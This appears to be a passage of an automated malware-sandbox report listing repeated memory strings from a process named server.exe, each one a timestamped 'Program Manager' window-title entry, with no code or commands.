          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 04:20:50 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:12:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:59:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 06:53:30 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:32:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 03:32:40 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 02:06:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:42:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 17:33:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 16:25:07 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:00:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:55:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:18:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:16:49 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 21:25:02 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:27:20 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 14:05:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 22:22:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 22:10:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:40:22 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 22:56:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:15:33 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:33:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 14:25:28 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:18:38 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:57:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:12:16 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:51:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:26:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:32:20 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:55:40 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:59:58 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:07:03 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:44:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:53:56 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 00:23:24 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:55:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:53:42 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 23:21:16 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:19:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:19:03 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:08:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/20 | 00:15:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:14:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 23:09:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 13:30:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 20:43:37 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 14:01:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 01:24:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:29:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:31:11 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:58:14 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 08:46:54 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 07:20:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:21:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:00:24 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:36:05 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 08:24:51 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 10:11:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 12:45:52 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 15:56:01 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 18:13:15 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/07 | 02:49:19 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 07:43:51 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 16:20:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:42:45 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/30 | 04:09:39 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:01:36 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:36:52 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 20:07:16 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 13:14:47 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 15:09:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 05:43:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 05:37:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:57:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 21:24:48 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 07:07:44 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 13:48:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 20:55:07 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:11:46 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:00:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 21:24:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:56:59 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/25 | 16:00:55 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 19:53:13 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:17:17 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 02:03:03 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 22:49:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 14:08:31 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 06:52:25 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 21:38:23 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 18:58:10 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 07:15:12 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 15:06:52 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 15:11:02 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 23:20:06 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 07:06:32 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 01:39:00 - Program Manager
          Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 11:57:08 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 13:06:29 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 21:42:41 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 10:31:57 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/28 | 00:06:34 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 11:57:19 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/23 | 05:04:18 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/27 | 23:13:43 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:03:21 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/15 | 03:33:05 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/19 | 22:57:04 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/22 | 19:31:15 - Program Manager
          Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/08/14 | 17:42:31 - Program Manager
